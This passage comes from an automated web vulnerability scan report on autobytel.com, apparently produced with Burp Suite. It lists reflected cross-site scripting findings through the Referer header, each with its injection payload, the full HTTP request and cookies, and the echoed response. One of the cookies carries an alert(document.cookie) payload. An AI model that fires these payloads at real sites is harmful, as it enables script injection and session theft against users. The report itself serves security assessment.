The value of the Referer HTTP header is copied into an HTML comment. The payload 1bb3a--><img%20src%3da%20onerror%3dalert(1)>4f1f9a9fc8b was submitted in the Referer HTTP header. This input was echoed as 1bb3a--><img src=a onerror=alert(1)>4f1f9a9fc8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:34:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:34:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:34:33 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:34:33 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E1bb3a%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E4f1f9a9fc8b;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 53192

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>4f1f9a9fc8b -->
...[SNIP]...

4.1937. http://www.autobytel.com/content/research/article/index.cfm/filters/Buying%20Guide [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm/filters/Buying%20Guide

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58188"%3balert(1)//e6d87bfda67 was submitted in the Referer HTTP header. This input was echoed as 58188";alert(1)//e6d87bfda67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/research/article/index.cfm/filters/Buying%20Guide HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=58188"%3balert(1)//e6d87bfda67

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:43 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:43 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E58188%22%3Balert%281%29%2F%2Fe6d87bfda67;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45683

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~58188";alert(1)//e6d87bfda67";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47E4E6CE-BC88-30CA-55098C42
...[SNIP]...

4.1938. http://www.autobytel.com/content/research/article/index.cfm/filters/Buying%20Guide [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm/filters/Buying%20Guide

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 727dd--><img%20src%3da%20onerror%3dalert(1)>24c9032c8d0 was submitted in the Referer HTTP header. This input was echoed as 727dd--><img src=a onerror=alert(1)>24c9032c8d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:59 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:59 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E727dd%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E24c9032c8d0;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45721

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>24c9032c8d0 -->
...[SNIP]...

4.1939. http://www.autobytel.com/content/research/comparison/index.cfm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/comparison/index.cfm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ea24"%3balert(1)//01111d12432 was submitted in the Referer HTTP header. This input was echoed as 8ea24";alert(1)//01111d12432 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/research/comparison/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=8ea24"%3balert(1)//01111d12432

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:58:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:58:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:58:16 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:58:16 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E8ea24%22%3Balert%281%29%2F%2F01111d12432;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 414231

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~8ea24";alert(1)//01111d12432";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48A10211-D052-62BD-B2394BEF
...[SNIP]...

4.1940. http://www.autobytel.com/content/research/comparison/index.cfm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/comparison/index.cfm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 98cfa--><img%20src%3da%20onerror%3dalert(1)>5e9e92a6325 was submitted in the Referer HTTP header. This input was echoed as 98cfa--><img src=a onerror=alert(1)>5e9e92a6325 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:58:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:58:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:58:52 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:58:52 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E98cfa%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E5e9e92a6325;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 414256

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>5e9e92a6325 -->
...[SNIP]...

4.1941. http://www.autobytel.com/content/research/index.cfm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/index.cfm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload b2b0b--><img%20src%3da%20onerror%3dalert(1)>fc61a284c7c was submitted in the Referer HTTP header. This input was echoed as b2b0b--><img src=a onerror=alert(1)>fc61a284c7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /content/research/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=b2b0b--><img%20src%3da%20onerror%3dalert(1)>fc61a284c7c

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:30 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:30 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Eb2b0b%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Efc61a284c7c;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 104174

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>fc61a284c7c -->
...[SNIP]...

4.1942. http://www.autobytel.com/content/research/index.cfm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/index.cfm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bcb3"%3balert(1)//cd492363a17 was submitted in the Referer HTTP header. This input was echoed as 2bcb3";alert(1)//cd492363a17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:08 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:08 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E2bcb3%22%3Balert%281%29%2F%2Fcd492363a17;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 104164

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~2bcb3";alert(1)//cd492363a17";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47DF8752-E661-644C-5D3D34D1
...[SNIP]...

4.1943. http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/kbb/index.cfm/action/selectyear/valuetype/TI

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4daf0"%3balert(1)//354c9a1feaa was submitted in the Referer HTTP header. This input was echoed as 4daf0";alert(1)//354c9a1feaa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/research/kbb/index.cfm/action/selectyear/valuetype/TI HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=4daf0"%3balert(1)//354c9a1feaa

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:35:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:35:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:35:42 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:35:42 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E4daf0%22%3Balert%281%29%2F%2F354c9a1feaa;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 37584

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~4daf0";alert(1)//354c9a1feaa";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47D256F3-004E-7B32-8036E3E7
...[SNIP]...

4.1944. http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/kbb/index.cfm/action/selectyear/valuetype/TI

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload d6991--><img%20src%3da%20onerror%3dalert(1)>66db5d2ea74 was submitted in the Referer HTTP header. This input was echoed as d6991--><img src=a onerror=alert(1)>66db5d2ea74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:54 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:54 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ed6991%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E66db5d2ea74;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 37622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>66db5d2ea74 -->
...[SNIP]...

4.1945. http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 301b4--><img%20src%3da%20onerror%3dalert(1)>dcf95c6f956 was submitted in the Referer HTTP header. This input was echoed as 301b4--><img src=a onerror=alert(1)>dcf95c6f956 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=301b4--><img%20src%3da%20onerror%3dalert(1)>dcf95c6f956

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:27:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:27:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:27:32 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:27:32 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E301b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Edcf95c6f956;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 34821

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>dcf95c6f956 -->
...[SNIP]...

4.1946. http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d00ae"%3balert(1)//0ebf00d462 was submitted in the Referer HTTP header. This input was echoed as d00ae";alert(1)//0ebf00d462 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
